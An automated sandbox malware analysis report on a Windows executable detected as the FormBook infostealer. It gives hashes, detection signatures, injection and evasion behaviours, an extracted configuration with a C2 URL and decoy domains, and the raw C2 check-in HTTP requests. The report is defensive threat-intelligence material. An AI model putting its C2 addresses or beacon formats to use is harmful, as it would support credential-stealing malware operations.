Analysis Report 00098765123POIIU.exe

Overview

General Information

Sample Name: 00098765123POIIU.exe
Analysis ID: 411893
MD5: 4e2d6ab0c9a56aee76ba33bd26dce9b1
SHA1: 52950b4637fc55518efc063ced7bec0867f9051e
SHA256: 5e2255d59560c85c4a6c30ffa54e00b2805b584292de464befaf01a614539229
Tags: exe
Infos:

Most interesting Screenshot:

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected AntiVM3
Yara detected FormBook
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Injects a PE file into a foreign processes
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Writes to foreign memory regions
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

AV Detection:

barindex
Found malware configuration
Source: 00000007.00000002.595659857.00000000004F0000.00000004.00000001.sdmp Malware Configuration Extractor: FormBook {"C2 list": ["www.hysjs168.com/uv34/"], "decoy": ["lattakia-imbiss.com", "helenafinaltouch.com", "yogamays.com", "habangli.com", "embraceblm.com", "freeurlsite.com", "szxanpet.com", "inspirationalsblog.com", "calibratefirearms.net", "chelseashalza.com", "ihdeuruim.com", "symbolofsafety.com", "albanyhumanesociety.net", "exclusiveoffer.bet", "888yuntu.com", "maraitime.com", "caletaexperience.com", "dreamlikeliving.com", "wolvesmito.club", "zbyunjin.com", "senkrononline.com", "thesugarbasket.com", "organiccbgoil.com", "amazoncor.xyz", "dofus-tr.com", "bhzconstrutora.com", "onlinepaintandsips.com", "sandybottomsflipflops.com", "paobuyingxiong.com", "wokeinteractive.com", "furbabiesandflowers.com", "hellojesse.com", "ssssummit.com", "vaiu-ks.com", "akb48-loveantena.com", "wagsorganics.com", "import-union.com", "sxrqsgs.icu", "72loca.com", "ssc018.com", "jewelta.com", "buildingdigitalmind.com", "pantechinsulation.com", "cobakoreksinjinx.com", "mischurretes.com", "contorig2.com", "julesecurity.com", "soccer-yokouchi.club", "gofourd.com", "holdimob.com", "omorashi-mania.com", "ytksw.com", "gsf-fashon.com", "bogolacke.com", "odislewis.com", "shenzhenmaojinchang.com", "kimsfist.com", "xsites-dev.xyz", "buraktradingltd.com", "muldentaxi.com", "supergurlmarketing.com", "areametalurgia.com", "dejikatsu.com", "pcbet999.com"]}
Multi AV Scanner detection for submitted file
Source: 00098765123POIIU.exe ReversingLabs: Detection: 25%
Yara detected FormBook
Source: Yara match File source: 00000007.00000002.595659857.00000000004F0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.377717750.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.596425182.00000000032F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.378011381.0000000000E40000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.597635869.0000000003750000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.338604587.0000000004261000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.378035530.0000000000E70000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
Antivirus or Machine Learning detection for unpacked file
Source: 3.2.RegSvcs.exe.400000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen

Compliance:

barindex
Uses 32bit PE files
Source: 00098765123POIIU.exe Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
Source: 00098765123POIIU.exe Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000004.00000000.359826334.0000000007CA0000.00000002.00000001.sdmp
Source: Binary string: RegSvcs.pdb, source: wlanext.exe, 00000007.00000002.597849484.0000000003AA7000.00000004.00000001.sdmp
Source: Binary string: wntdll.pdbUGP source: RegSvcs.exe, 00000003.00000002.378316502.000000000109F000.00000040.00000001.sdmp, wlanext.exe, 00000007.00000002.596853586.00000000034BF000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb source: RegSvcs.exe, wlanext.exe, 00000007.00000002.596853586.00000000034BF000.00000040.00000001.sdmp
Source: Binary string: wlanext.pdb source: RegSvcs.exe, 00000003.00000002.378064218.0000000000EB0000.00000040.00000001.sdmp
Source: Binary string: RegSvcs.pdb source: wlanext.exe, 00000007.00000002.597849484.0000000003AA7000.00000004.00000001.sdmp
Source: Binary string: wlanext.pdbGCTL source: RegSvcs.exe, 00000003.00000002.378064218.0000000000EB0000.00000040.00000001.sdmp
Source: Binary string: wscui.pdb source: explorer.exe, 00000004.00000000.359826334.0000000007CA0000.00000002.00000001.sdmp

Software Vulnerabilities:

barindex
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then pop edi 3_2_0040C3D5
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 4x nop then pop edi 7_2_032FC3D5

Networking:

barindex
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49744 -> 173.236.152.151:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49744 -> 173.236.152.151:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49744 -> 173.236.152.151:80
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: www.hysjs168.com/uv34/
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /uv34/?_JB=SL3d2L8&D0Dhj=PNkuYexmaEbpw3EaQG1gqEXEhReu9m0wSncWUc9u1VG5H+XH3gAiJ6++bzNk4ZSFpS3p79DaPA== HTTP/1.1Host: www.contorig2.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /uv34/?D0Dhj=I0+BvmO4ljK/nbLycIQPHPNytqxJ+McfjEJZrssF4WFDr3bjf8ExST5+Hjhrql3HpJj1V9F8nQ==&_JB=SL3d2L8 HTTP/1.1Host: www.muldentaxi.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /uv34/?_JB=SL3d2L8&D0Dhj=JPLVpJ2/QgCmFDz5d9+MEwsOtRSRnv4p4HgKpBtvwLNy+R4nAh4AcVIWdvhB9Yv67aR/bJ0jJQ== HTTP/1.1Host: www.gofourd.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /uv34/?D0Dhj=zJB2497tyCkLF9DVAXbTh77yBITnH8u2gz7PlO+nNFbEPXoEJKTpFMEIIpupFtT+IJYk9y/VZw==&_JB=SL3d2L8 HTTP/1.1Host: www.ihdeuruim.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /uv34/?_JB=SL3d2L8&D0Dhj=eNNoAymEF6y0s09AHznbvWkLlOIpJJQGxSgvNiYX7faSVxdWVtwFBOGKoePvfd+8zgTPPgb0Mw== HTTP/1.1Host: www.embraceblm.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /uv34/?D0Dhj=OWF93oT5YKzzQXpFcytjmkfHvlUSZBJisBPI3VKZy/Exqh7cdZ6jotFcBNfsZIZ5A8+OquT2pg==&_JB=SL3d2L8 HTTP/1.1Host: www.ytksw.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /uv34/?_JB=SL3d2L8&D0Dhj=D75OsDlTHma4nCt/XHhVQTvedHvqJVej3CEGNnFddBs05fHEvG09IitQFVRojVJr/TkJxJHlYg== HTTP/1.1Host: www.buraktradingltd.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /uv34/?D0Dhj=+vqKyqUCNNB8UOC5vqb0WBoKaqjxAK/4hHhktlBEWoOvrJqCXDBsl1GlrElBRZa3I6kwNHO8pA==&_JB=SL3d2L8 HTTP/1.1Host: www.bogolacke.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /uv34/?_JB=SL3d2L8&D0Dhj=n+Qx4VWs28a7eV8im5Y5Lb9MLKmoTPPxFKEnTVg2IpEKdb6ImeQQO/tB44tc09WLnIG/s9VgcA== HTTP/1.1Host: www.albanyhumanesociety.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /uv34/?_JB=SL3d2L8&D0Dhj=/y2QUNCyd1bGxdPjEN+TG3wvArtE+ieT5j9LKQh68qSP5982epgdoI7eXFRWiHaQS6pCkVOSpw== HTTP/1.1Host: www.sandybottomsflipflops.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 198.54.117.217 198.54.117.217
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: GODADDY-AMSDE GODADDY-AMSDE
Source: Joe Sandbox View ASN Name: NAMECHEAP-NETUS NAMECHEAP-NETUS
Source: global traffic HTTP traffic detected: GET /uv34/?_JB=SL3d2L8&D0Dhj=PNkuYexmaEbpw3EaQG1gqEXEhReu9m0wSncWUc9u1VG5H+XH3gAiJ6++bzNk4ZSFpS3p79DaPA== HTTP/1.1Host: www.contorig2.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /uv34/?D0Dhj=I0+BvmO4ljK/nbLycIQPHPNytqxJ+McfjEJZrssF4WFDr3bjf8ExST5+Hjhrql3HpJj1V9F8nQ==&_JB=SL3d2L8 HTTP/1.1Host: www.muldentaxi.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /uv34/?_JB=SL3d2L8&D0Dhj=JPLVpJ2/QgCmFDz5d9+MEwsOtRSRnv4p4HgKpBtvwLNy+R4nAh4AcVIWdvhB9Yv67aR/bJ0jJQ== HTTP/1.1Host: www.gofourd.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /uv34/?D0Dhj=zJB2497tyCkLF9DVAXbTh77yBITnH8u2gz7PlO+nNFbEPXoEJKTpFMEIIpupFtT+IJYk9y/VZw==&_JB=SL3d2L8 HTTP/1.1Host: www.ihdeuruim.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /uv34/?_JB=SL3d2L8&D0Dhj=eNNoAymEF6y0s09AHznbvWkLlOIpJJQGxSgvNiYX7faSVxdWVtwFBOGKoePvfd+8zgTPPgb0Mw== HTTP/1.1Host: www.embraceblm.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /uv34/?D0Dhj=OWF93oT5YKzzQXpFcytjmkfHvlUSZBJisBPI3VKZy/Exqh7cdZ6jotFcBNfsZIZ5A8+OquT2pg==&_JB=SL3d2L8 HTTP/1.1Host: www.ytksw.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /uv34/?_JB=SL3d2L8&D0Dhj=D75OsDlTHma4nCt/XHhVQTvedHvqJVej3CEGNnFddBs05fHEvG09IitQFVRojVJr/TkJxJHlYg== HTTP/1.1Host: www.buraktradingltd.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /uv34/?D0Dhj=+vqKyqUCNNB8UOC5vqb0WBoKaqjxAK/4hHhktlBEWoOvrJqCXDBsl1GlrElBRZa3I6kwNHO8pA==&_JB=SL3d2L8 HTTP/1.1Host: www.bogolacke.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /uv34/?_JB=SL3d2L8&D0Dhj=n+Qx4VWs28a7eV8im5Y5Lb9MLKmoTPPxFKEnTVg2IpEKdb6ImeQQO/tB44tc09WLnIG/s9VgcA== HTTP/1.1Host: www.albanyhumanesociety.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /uv34/?_JB=SL3d2L8&D0Dhj=/y2QUNCyd1bGxdPjEN+TG3wvArtE+ieT5j9LKQh68qSP5982epgdoI7eXFRWiHaQS6pCkVOSpw== HTTP/1.1Host: www.sandybottomsflipflops.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: unknown DNS traffic detected: queries for: www.contorig2.com
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 12 May 2021 06:41:48 GMTServer: Apache/2.4.29 (Ubuntu)Content-Length: 328Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 75 76 33 34 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /uv34/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: explorer.exe, 00000004.00000000.363001805.000000000B1A6000.00000002.00000001.sdmp String found in binary or memory: http://fontfabrik.com
Source: 00098765123POIIU.exe, 00000000.00000002.337814717.0000000003261000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: explorer.exe, 00000004.00000000.363001805.000000000B1A6000.00000002.00000001.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: explorer.exe, 00000004.00000000.341318764.000000000095C000.00000004.00000020.sdmp String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: explorer.exe, 00000004.00000000.363001805.000000000B1A6000.00000002.00000001.sdmp String found in binary or memory: http://www.carterandcone.coml
Source: explorer.exe, 00000004.00000000.363001805.000000000B1A6000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 00000004.00000000.363001805.000000000B1A6000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers
Source: explorer.exe, 00000004.00000000.363001805.000000000B1A6000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/?
Source: explorer.exe, 00000004.00000000.363001805.000000000B1A6000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: explorer.exe, 00000004.00000000.363001805.000000000B1A6000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: explorer.exe, 00000004.00000000.363001805.000000000B1A6000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers8
Source: explorer.exe, 00000004.00000000.363001805.000000000B1A6000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers?
Source: explorer.exe, 00000004.00000000.363001805.000000000B1A6000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designersG
Source: explorer.exe, 00000004.00000000.363001805.000000000B1A6000.00000002.00000001.sdmp String found in binary or memory: http://www.fonts.com
Source: explorer.exe, 00000004.00000000.363001805.000000000B1A6000.00000002.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn
Source: explorer.exe, 00000004.00000000.363001805.000000000B1A6000.00000002.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: explorer.exe, 00000004.00000000.363001805.000000000B1A6000.00000002.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: explorer.exe, 00000004.00000000.363001805.000000000B1A6000.00000002.00000001.sdmp String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: explorer.exe, 00000004.00000000.363001805.000000000B1A6000.00000002.00000001.sdmp String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: explorer.exe, 00000004.00000000.363001805.000000000B1A6000.00000002.00000001.sdmp String found in binary or memory: http://www.goodfont.co.kr
Source: explorer.exe, 00000004.00000000.363001805.000000000B1A6000.00000002.00000001.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: explorer.exe, 00000004.00000000.363001805.000000000B1A6000.00000002.00000001.sdmp String found in binary or memory: http://www.sajatypeworks.com
Source: explorer.exe, 00000004.00000000.363001805.000000000B1A6000.00000002.00000001.sdmp String found in binary or memory: http://www.sakkal.com
Source: explorer.exe, 00000004.00000000.363001805.000000000B1A6000.00000002.00000001.sdmp String found in binary or memory: http://www.sandoll.co.kr
Source: explorer.exe, 00000004.00000000.363001805.000000000B1A6000.00000002.00000001.sdmp String found in binary or memory: http://www.tiro.com
Source: explorer.exe, 00000004.00000000.363001805.000000000B1A6000.00000002.00000001.sdmp String found in binary or memory: http://www.typography.netD
Source: explorer.exe, 00000004.00000000.363001805.000000000B1A6000.00000002.00000001.sdmp String found in binary or memory: http://www.urwpp.deDPlease
Source: explorer.exe, 00000004.00000000.363001805.000000000B1A6000.00000002.00000001.sdmp String found in binary or memory: http://www.zhongyicts.com.cn
Source: 00098765123POIIU.exe, 00000000.00000002.337921223.00000000032B0000.00000004.00000001.sdmp String found in binary or memory: https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.css

E-Banking Fraud:

barindex
Yara detected FormBook
Source: Yara match File source: 00000007.00000002.595659857.00000000004F0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.377717750.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.596425182.00000000032F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.378011381.0000000000E40000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.597635869.0000000003750000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.338604587.0000000004261000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.378035530.0000000000E70000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE

System Summary:

barindex
Malicious sample detected (through community Yara rule)
Source: 00000007.00000002.595659857.00000000004F0000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.595659857.00000000004F0000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000003.00000002.377717750.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000002.377717750.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.596425182.00000000032F0000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.596425182.00000000032F0000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000003.00000002.378011381.0000000000E40000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000002.378011381.0000000000E40000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.597635869.0000000003750000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.597635869.0000000003750000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.338604587.0000000004261000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.338604587.0000000004261000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000003.00000002.378035530.0000000000E70000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000002.378035530.0000000000E70000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 3.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 3.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Contains functionality to call native functions
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_004181B0 NtCreateFile, 3_2_004181B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00418260 NtReadFile, 3_2_00418260
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_004182E0 NtClose, 3_2_004182E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00418390 NtAllocateVirtualMemory, 3_2_00418390
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_004181AA NtCreateFile, 3_2_004181AA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_0041825A NtReadFile, 3_2_0041825A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_004182DA NtClose, 3_2_004182DA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FE98F0 NtReadVirtualMemory,LdrInitializeThunk, 3_2_00FE98F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FE9860 NtQuerySystemInformation,LdrInitializeThunk, 3_2_00FE9860
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FE9840 NtDelayExecution,LdrInitializeThunk, 3_2_00FE9840
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FE99A0 NtCreateSection,LdrInitializeThunk, 3_2_00FE99A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FE9910 NtAdjustPrivilegesToken,LdrInitializeThunk, 3_2_00FE9910
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FE9A50 NtCreateFile,LdrInitializeThunk, 3_2_00FE9A50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FE9A20 NtResumeThread,LdrInitializeThunk, 3_2_00FE9A20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FE9A00 NtProtectVirtualMemory,LdrInitializeThunk, 3_2_00FE9A00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FE95D0 NtClose,LdrInitializeThunk, 3_2_00FE95D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FE9540 NtReadFile,LdrInitializeThunk, 3_2_00FE9540
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FE96E0 NtFreeVirtualMemory,LdrInitializeThunk, 3_2_00FE96E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FE9660 NtAllocateVirtualMemory,LdrInitializeThunk, 3_2_00FE9660
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FE9FE0 NtCreateMutant,LdrInitializeThunk, 3_2_00FE9FE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FE97A0 NtUnmapViewOfSection,LdrInitializeThunk, 3_2_00FE97A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FE9780 NtMapViewOfSection,LdrInitializeThunk, 3_2_00FE9780
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FE9710 NtQueryInformationToken,LdrInitializeThunk, 3_2_00FE9710
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FE98A0 NtWriteVirtualMemory, 3_2_00FE98A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FEB040 NtSuspendThread, 3_2_00FEB040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FE9820 NtEnumerateKey, 3_2_00FE9820
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FE99D0 NtCreateProcessEx, 3_2_00FE99D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FE9950 NtQueueApcThread, 3_2_00FE9950
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FE9A80 NtOpenDirectoryObject, 3_2_00FE9A80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FE9A10 NtQuerySection, 3_2_00FE9A10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FEA3B0 NtGetContextThread, 3_2_00FEA3B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FE9B00 NtSetValueKey, 3_2_00FE9B00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FE95F0 NtQueryInformationFile, 3_2_00FE95F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FE9560 NtWriteFile, 3_2_00FE9560
